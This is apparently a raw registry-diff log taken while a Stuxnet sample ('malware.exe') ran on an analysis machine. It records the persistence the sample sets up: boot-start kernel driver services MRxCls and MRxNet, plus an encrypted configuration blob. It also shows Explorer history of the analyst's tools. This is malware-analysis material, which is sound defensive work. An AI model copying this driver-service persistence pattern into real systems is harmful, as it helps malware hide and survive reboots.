HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Class: "LegacyDriver" HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}" HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\DeviceDesc: "MRXCLS" HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Control\*NewlyCreated*: 0x00000000 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Control\ActiveService: "MRxCls" HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\NextInstance: 0x00000001 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Service: "MRxNet" HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Legacy: 0x00000001 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\ConfigFlags: 0x00000000 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Class: "LegacyDriver" HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}" HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\DeviceDesc: "MRXNET" HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Control\*NewlyCreated*: 0x00000000 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Control\ActiveService: "MRxNet" HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Description: "MRXCLS" HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\DisplayName: "MRXCLS" HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\ErrorControl: 0x00000000 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Group: "Network" HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\ImagePath: "\??\C:\WINDOWS\system32\Drivers\mrxcls.sys" HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Start: 0x00000001 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Type: 0x00000001 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Data: 8F 1F F7 6D 7D B1 C9 09 9D CC 24 7A C6 9F FB 23 90 BD 9D BF F1 D4 51 92 2A B4 1F 6A 2E A6 4F B3 CB 69 7C 0B 92 3B 1B C0 D7 75 17 A9 E3 33 48 DC AD F6 DA EA 2F 87 10 C4 21 81 A5 75 68 00 2E B1 C2 7B EB DD BB 72 47 DC 87 91 14 A5 F3 C4 32 B0 CC 93 38 36 6B 49 0A F2 6F 1F 1D A1 4A 15 05 80 4B 13 A8 AA 82 41 4B 89 DC 89 24 A2 ED 16 37 F3 42 A9 A0 6A 7F 82 CD 90 E5 3C 49 CC B2 97 CA CB 7B 64 C1 48 B2 4C F5 AE 54 42 74 0F 00 31 FD 80 E8 7E 0E 69 12 42 3A EC 0F 6F 03 B8 46 9C 68 97 AC 62 16 FB 1A 1B D9 33 6C E8 F9 93 C3 56 54 A1 89 7A 7B 77 CE BA 0D 95 A7 0F AB 5E 1C 3C 18 63 AE 3E 60 A6 81 BC FA 85 FB 37 A0 0A 57 F9 C9 D3 CF 6B 41 D9 6D CD 39 71 C5 11 83 F1 D9 F3 7D B7 91 F7 70 46 C2 24 F7 B9 0F 2D B2 60 72 1C 8F F9 98 16 34 52 4B 7D 5F 81 5F 35 FD 8B 3E 78 B1 0B 0A 90 5A D8 30 5A 56 90 9A C0 C1 0F EB 95 D5 2F B7 C5 8D 2B 3F 49 41 8B 86 B4 DB 71 67 69 E6 E8 69 77 29 77 18 82 11 8B D7 5D 26 E4 5A 5C 2C 46 C2 F0 02 28 D8 EA 4B 95 9C 3A 3C 12 DA C4 87 21 91 4F D0 6E FA C4 DD B7 C9 AF E2 AE FE 14 0F 53 C4 BA DD 31 1A 38 7B 37 C0 9E 83 FF 2C B2 4C 88 33 C1 89 E5 CA 68 31 2D 20 CE 50 64 7B 39 C7 FB B1 9F A9 0D 6C 2A 82 AE 7F 25 43 A7 A2 28 EB 27 73 C9 45 F9 FD 53 A8 F4 A7 FD B4 90 B2 28 D8 0C 5A A8 84 D0 7F ED 99 25 18 FE B8 4C 48 66 8D 59 40 F6 CC 30 A6 F4 04 E8 76 9C EA 0E F6 A4 4A CE D2 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Enum\0: "Root\LEGACY_MRXCLS\0000" HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Enum\Count: 0x00000001 HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Enum\NextInstance: 0x00000001 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Description: "MRXNET" HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\DisplayName: "MRXNET" HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\ErrorControl: 0x00000000 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Group: "Network" HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\ImagePath: "\??\C:\WINDOWS\system32\Drivers\mrxnet.sys" HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Start: 0x00000001 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Type: 0x00000001 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Enum\0: "Root\LEGACY_MRXNET\0000" HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Enum\Count: 0x00000001 HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Enum\NextInstance: 0x00000001 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHAPCY:gvzrqngr.pcy: 04 00 00 00 06 00 00 00 00 54 07 85 81 FE CF 01 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\ZJ\Ybgf bs Fghkarg\fazj\znyjner.rkr: 04 00 00 00 06 00 00 00 50 13 53 27 90 93 CA 01 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\0: 34 00 31 00 00 00 00 00 2C 3C 8C 70 10 00 73 6E 6D 77 00 00 20 00 03 00 04 00 EF BE 2C 3C 8C 70 2C 3C 8C 70 14 00 00 00 73 00 6E 00 6D 00 77 00 00 00 14 00 00 00 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\0\NodeSlot: 0x00000022 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\0\MRUListEx: FF FF FF FF HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\FolderType: "Documents" HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Mode: 0x00000006 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\ScrollPos1280x720(1).x: 0x00000000 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\ScrollPos1280x720(1).y: 0x00000000 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Sort: 0x00000000 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\SortDir: 0x00000001 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Col: 0xFFFFFFFF HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\ColInfo: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FD DF DF FD 0F 00 06 00 28 00 10 00 34 00 48 00 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 04 00 00 00 05 00 00 00 B4 00 60 00 78 00 78 00 B4 00 B4 00 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\MinPos1280x720(1).x: 0xFFFFFFFF HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\MinPos1280x720(1).y: 0xFFFFFFFF HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\MaxPos1280x720(1).x: 0xFFFFFFFF HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\MaxPos1280x720(1).y: 0xFFFFFFFF HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WinPos1280x720(1).left: 0x000000CB HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WinPos1280x720(1).top: 0x00000034 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WinPos1280x720(1).right: 0x000003EB HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WinPos1280x720(1).bottom: 0x0000028C HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Rev: 0x00000000 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WFlags: 0x00000000 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\ShowCmd: 0x00000001 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\FFlags: 0x00000001 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\HotKey: 0x00000000 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Buttons: 0xFFFFFFFF HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Links: 0x00000000 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Address: 0x00000000 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Vid: "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\MW\Lots of Stuxnet\snmw\malware.exe: "malware" HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\WinRAR\Interface\ShowPassword: 0x00000000 ---------------------------------- Values modified: 17 ---------------------------------- HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 5B 70 29 6B 9F F8 6B 2E 27 BB 05 43 02 B3 42 43 88 7C 39 EA 7C 8F C3 C1 DA 61 6A 7A 3D A9 27 BB 06 12 F2 A2 B5 89 09 83 C9 CE 03 F8 7F 6C 1E 79 D9 10 7D F0 29 05 03 B9 29 88 8C EC E2 3C CB 04 12 E3 E3 EC 8F E6 27 0A 15 A9 09 6C 29 34 89 55 HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 53 06 23 D9 FE 36 71 5D D7 02 23 98 92 D3 0C AA 52 45 17 A4 D9 2B 2E E6 C7 C1 12 FE D2 A0 E1 8A 5F CF 23 E0 9B 16 74 7E DC 38 BF 7E D6 F0 9F 97 9A 5B C8 12 7C C2 9E CE EF 95 DE D1 60 56 23 7A 21 96 9C 23 E4 CF D9 77 67 97 F4 EA F1 0D 25 18 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count\HRZR_PGYFRFFVBA: 81 9C 54 0E 05 00 00 00 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count\HRZR_PGYFRFFVBA: E3 F3 7F 0E 04 00 00 00 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 04 00 00 00 79 00 00 00 E0 8D E6 42 90 93 CA 01 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 04 00 00 00 77 00 00 00 A0 EC DC 76 81 FE CF 01 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHAPCY: 04 00 00 00 0B 00 00 00 00 54 07 85 81 FE CF 01 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHAPCY: 01 00 00 00 0B 00 00 00 60 F6 98 73 27 F4 CF 01 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 04 00 00 00 4C 00 00 00 F0 8C 4C 41 90 93 CA 01 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 04 00 00 00 4A 00 00 00 90 73 55 73 81 FE CF 01 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\FlfGbbyf\Nhgbehaf\nhgbehaf.rkr: 04 00 00 00 08 00 00 00 E0 8D E6 42 90 93 CA 01 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\FlfGbbyf\Nhgbehaf\nhgbehaf.rkr: 04 00 00 00 07 00 00 00 50 F6 45 98 7E FE CF 01 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\Shell\Bags\1\Desktop\ItemPos1280x720(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 16 02 00 00 14 00 1F 60 40 F0 5F 64 81 50 1B 10 9F 08 00 AA 00 2F 95 4E 15 00 00 00 4E 00 00 00 5A 00 3A 00 D4 02 00 00 5E 45 49 46 20 00 4D 4F 5A 49 4C 4C 7E 31 2E 4C 4E 4B 00 00 3E 00 03 00 04 00 EF BE 5E 45 49 46 6C 45 D2 6B 14 00 00 00 4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 20 00 46 00 69 00 72 00 65 00 66 00 6F 00 78 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 CA 01 00 00 34 00 31 00 00 00 00 00 5E 45 65 50 10 00 6D 62 61 72 00 00 20 00 03 00 04 00 EF BE 5E 45 63 50 5F 45 8D 55 14 00 00 00 6D 00 62 00 61 00 72 00 00 00 14 00 60 00 00 00 CA 01 00 00 2E 00 31 00 00 00 00 00 6C 45 4F 6C 10 00 4D 57 00 00 1C 00 03 00 04 00 EF BE 6C 45 48 6C 6C 45 4F 6C 14 00 00 00 4D 00 57 00 00 00 12 00 60 00 00 00 E6 00 00 00 3C 00 31 00 00 00 00 00 6A 45 6B 21 10 00 6F 64 62 67 31 31 30 00 26 00 03 00 04 00 EF BE 6A 45 F4 1A 6C 45 59 6C 14 00 00 00 6F 00 64 00 62 00 67 00 31 00 31 00 30 00 00 00 16 00 AB 00 00 00 02 00 00 00 4C 00 31 00 00 00 00 00 6C 45 0F 6D 10 00 52 45 47 53 48 4F 7E 31 2E 30 00 00 32 00 03 00 04 00 EF BE 6C 45 0F 6D 6C 45 12 6D 14 00 00 00 52 00 65 00 67 00 73 00 68 00 6F 00 74 00 2D 00 31 00 2E 00 39 00 2E 00 30 00 00 00 1A 00 60 00 00 00 16 02 00 00 40 00 31 00 00 00 00 00 6C 45 D1 6E 10 00 53 79 73 54 6F 6F 6C 73 00 00 28 00 03 00 04 00 EF BE 6C 45 73 6C 6C 45 D1 6E 14 00 00 00 53 00 79 00 73 00 54 00 6F 00 6F 00 6C 00 73 00 00 00 18 00 15 00 00 00 02 00 00 00 3C 00 32 00 5F 38 1C 00 5E 45 EF 45 20 00 62 65 72 2E 72 61 72 00 26 00 03 00 04 00 EF BE 5E 45 EF 45 6C 45 AE 6B 14 00 00 00 62 00 65 00 72 00 2E 00 72 00 61 00 72 00 00 00 16 00 60 00 00 00 32 01 00 00 4E 00 32 00 78 ED 9C 00 5E 45 D0 51 20 00 48 49 54 4D 41 4E 7E 31 2E 45 58 45 00 00 32 00 03 00 04 00 EF BE 5E 45 C6 51 6A 45 87 28 14 00 00 00 48 00 69 00 74 00 6D 00 61 00 6E 00 50 00 72 00 6F 00 2E 00 65 00 78 0 0 65 00 00 00 1C 00 60 00 00 00 4E 00 00 00 5C 00 32 00 8B 02 00 00 6A 45 80 12 20 00 49 44 41 50 52 4F 7E 31 2E 4C 4E 4B 00 00 40 00 03 00 04 00 EF BE 6A 45 80 12 6A 45 E7 1A 14 00 00 00 49 00 44 00 41 00 20 00 50 00 72 00 6F 00 20 00 28 00 33 00 32 00 2D 00 62 00 69 00 74 00 29 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 60 00 00 00 9A 00 00 00 5C 00 32 00 97 02 00 00 6A 45 80 12 20 00 49 44 41 50 52 4F 7E 32 2E 4C 4E 4B 00 00 40 00 03 00 04 00 EF BE 6A 45 80 12 6A 45 F3 1E 14 00 00 00 49 00 44 00 41 00 20 00 50 00 72 00 6F 00 20 00 28 00 36 00 34 00 2D 00 62 00 69 00 74 00 29 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 60 00 00 00 02 00 00 00 52 00 32 00 CE 02 00 00 5E 45 74 83 20 00 4F 53 46 4F 52 45 7E 31 2E 4C 4E 4B 00 00 36 00 03 00 04 00 EF BE 5E 45 74 83 6A 45 12 59 14 00 00 00 4F 00 53 00 46 00 6F 00 72 00 65 00 6E 00 73 00 69 00 63 00 73 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 9A 00 00 00 66 00 32 00 97 01 00 00 5E 45 ED 46 20 00 53 48 4F 52 54 43 7E 31 2E 4C 4E 4B 00 00 4A 00 03 00 04 00 EF BE 5E 45 ED 46 6C 45 75 6C 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 44 00 6F 00 77 00 6E 00 6C 00 6F 00 61 00 64 00 73 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 E6 00 00 00 62 00 32 00 8A 02 00 00 5E 45 58 47 20 00 53 48 4F 52 54 43 7E 32 2E 4C 4E 4B 00 00 46 00 03 00 04 00 EF BE 5E 45 58 47 6C 45 E5 6C 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 66 00 69 00 72 00 65 00 66 00 6F 00 78 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 32 01 00 00 60 00 32 00 DF 02 00 00 5E 45 A8 48 20 00 53 48 4F 52 54 43 7E 33 2E 4C 4E 4B 00 00 44 00 03 00 04 00 EF BE 5E 45 A8 48 6C 45 5A 6C 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 77 00 69 00 6E 00 64 00 62 00 67 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 60 00 00 00 7E 01 00 00 50 00 32 00 F1 85 3F 00 5F 45 09 56 20 00 54 44 53 53 4B 49 7E 31 2E 5A 49 50 00 00 34 00 03 00 04 00 EF BE 5F 45 09 56 6C 45 75 6C 14 00 00 00 74 00 64 00 73 00 73 00 6B 00 69 00 6C 00 6C 00 65 00 72 00 2E 00 7A 00 69 00 70 00 00 00 1C 00 15 00 00 00 7E 01 00 00 4C 00 32 00 00 CE 05 00 5E 45 3B 50 20 00 74 67 32 69 6A 6E 6A 69 2E 65 78 65 00 00 30 00 03 00 04 00 EF BE 5E 45 3A 50 5E 45 35 83 14 00 00 00 74 00 67 00 32 00 69 00 6A 00 6E 00 6A 00 69 00 2E 00 65 00 78 00 65 00 00 00 1C 00 15 00 00 00 7E 01 00 00 00 00 00 00 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\Shell\Bags\1\Desktop\ItemPos1280x720(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 16 02 00 00 14 00 1F 60 40 F0 5F 64 81 50 1B 10 9F 08 00 AA 00 2F 95 4E 15 00 00 00 4E 00 00 00 5A 00 3A 00 D4 02 00 00 5E 45 49 46 20 00 4D 4F 5A 49 4C 4C 7E 31 2E 4C 4E 4B 00 00 3E 00 03 00 04 00 EF BE 5E 45 49 46 6C 45 D2 6B 14 00 00 00 4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 20 00 46 00 69 00 72 00 65 00 66 00 6F 00 78 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 CA 01 00 00 34 00 31 00 00 00 00 00 5E 45 65 50 10 00 6D 62 61 72 00 00 20 00 03 00 04 00 EF BE 5E 45 63 50 5F 45 8D 55 14 00 00 00 6D 00 62 00 61 00 72 00 00 00 14 00 60 00 00 00 CA 01 00 00 2E 00 31 00 00 00 00 00 6C 45 4F 6C 10 00 4D 57 00 00 1C 00 03 00 04 00 EF BE 6C 45 48 6C 6C 45 4F 6C 14 00 00 00 4D 00 57 00 00 00 12 00 60 00 00 00 E6 00 00 00 3C 00 31 00 00 00 00 00 6A 45 6B 21 10 00 6F 64 62 67 31 31 30 00 26 00 03 00 04 00 EF BE 6A 45 F4 1A 6C 45 59 6C 14 00 00 00 6F 00 64 00 62 00 67 00 31 00 31 00 30 00 00 00 16 00 60 00 00 00 16 02 00 00 40 00 31 00 00 00 00 00 6C 45 84 6C 10 00 53 79 73 54 6F 6F 6C 73 00 00 28 00 03 00 04 00 EF BE 6C 45 73 6C 6C 45 84 6C 14 00 00 00 53 00 79 00 73 00 54 00 6F 00 6F 00 6C 00 73 00 00 00 18 00 15 00 00 00 02 00 00 00 3C 00 32 00 5F 38 1C 00 5E 45 EF 45 20 00 62 65 72 2E 72 61 72 00 26 00 03 00 04 00 EF BE 5E 45 EF 45 6C 45 AE 6B 14 00 00 00 62 00 65 00 72 00 2E 00 72 00 61 00 72 00 00 00 16 00 60 00 00 00 32 01 00 00 4E 00 32 00 78 ED 9C 00 5E 45 D0 51 20 00 48 49 54 4D 41 4E 7E 31 2E 45 58 45 00 00 32 00 03 00 04 00 EF BE 5E 45 C6 51 6A 45 87 28 14 00 00 00 48 00 69 00 74 00 6D 00 61 00 6E 00 50 00 72 00 6F 00 2E 00 65 00 78 00 65 00 00 00 1C 00 60 00 00 00 4E 00 00 00 5C 00 32 00 8B 02 00 00 6A 45 80 12 20 00 49 44 41 50 52 4F 7E 31 2E 4C 4E 4B 00 00 40 00 03 00 04 00 EF BE 6A 45 80 12 6A 45 E7 1A 14 00 00 00 49 00 44 00 41 00 20 00 50 00 72 00 6F 00 20 00 28 00 33 00 32 0 0 2D 00 62 00 69 00 74 00 29 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 60 00 00 00 9A 00 00 00 5C 00 32 00 97 02 00 00 6A 45 80 12 20 00 49 44 41 50 52 4F 7E 32 2E 4C 4E 4B 00 00 40 00 03 00 04 00 EF BE 6A 45 80 12 6A 45 F3 1E 14 00 00 00 49 00 44 00 41 00 20 00 50 00 72 00 6F 00 20 00 28 00 36 00 34 00 2D 00 62 00 69 00 74 00 29 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 60 00 00 00 02 00 00 00 52 00 32 00 CE 02 00 00 5E 45 74 83 20 00 4F 53 46 4F 52 45 7E 31 2E 4C 4E 4B 00 00 36 00 03 00 04 00 EF BE 5E 45 74 83 6A 45 12 59 14 00 00 00 4F 00 53 00 46 00 6F 00 72 00 65 00 6E 00 73 00 69 00 63 00 73 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 9A 00 00 00 66 00 32 00 97 01 00 00 5E 45 ED 46 20 00 53 48 4F 52 54 43 7E 31 2E 4C 4E 4B 00 00 4A 00 03 00 04 00 EF BE 5E 45 ED 46 6C 45 75 6C 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 44 00 6F 00 77 00 6E 00 6C 00 6F 00 61 00 64 00 73 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 E6 00 00 00 62 00 32 00 8A 02 00 00 5E 45 58 47 20 00 53 48 4F 52 54 43 7E 32 2E 4C 4E 4B 00 00 46 00 03 00 04 00 EF BE 5E 45 58 47 6A 45 F3 1E 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 66 00 69 00 72 00 65 00 66 00 6F 00 78 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 32 01 00 00 60 00 32 00 DF 02 00 00 5E 45 A8 48 20 00 53 48 4F 52 54 43 7E 33 2E 4C 4E 4B 00 00 44 00 03 00 04 00 EF BE 5E 45 A8 48 6C 45 5A 6C 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 77 00 69 00 6E 00 64 00 62 00 67 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 60 00 00 00 7E 01 00 00 50 00 32 00 F1 85 3F 00 5F 45 09 56 20 00 54 44 53 53 4B 49 7E 31 2E 5A 49 50 00 00 34 00 03 00 04 00 EF BE 5F 45 09 56 6C 45 75 6C 14 00 00 00 74 00 64 00 73 00 73 00 6B 00 69 00 6C 00 6C 00 65 00 72 00 2E 00 7A 00 69 00 70 00 00 00 1C 00 15 00 00 00 7E 01 00 00 4C 00 32 00 00 CE 05 00 5E 45 3B 50 20 00 74 67 32 69 6A 6E 6A 69 2E 65 78 65 00 00 30 00 03 00 04 00 EF BE 5E 45 3A 50 5E 45 35 83 14 00 00 00 74 00 67 00 32 00 69 00 6A 00 6E 00 6A 00 69 00 2E 00 65 00 78 00 65 00 00 00 1C 00 AB 00 00 00 02 00 00 00 4C 00 31 00 00 00 00 00 6C 45 0F 6D 10 00 52 45 47 53 48 4F 7E 31 2E 30 00 00 32 00 03 00 04 00 EF BE 6C 45 0F 6D 6C 45 12 6D 14 00 00 00 52 00 65 00 67 00 73 00 68 00 6F 00 74 00 2D 00 31 00 2E 00 39 00 2E 00 30 00 00 00 1A 00 AB 00 00 00 02 00 00 00 00 00 00 00 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\NodeSlots: 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\NodeSlots: 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 07 00 00 00 06 00 00 00 08 00 00 00 02 00 00 00 01 00 00 00 05 00 00 00 04 00 00 00 03 00 00 00 00 00 00 00 FF FF FF FF HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 08 00 00 00 06 00 00 00 02 00 00 00 07 00 00 00 01 00 00 00 05 00 00 00 04 00 00 00 03 00 00 00 00 00 00 00 FF FF FF FF HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\MRUListEx: 00 00 00 00 FF FF FF FF 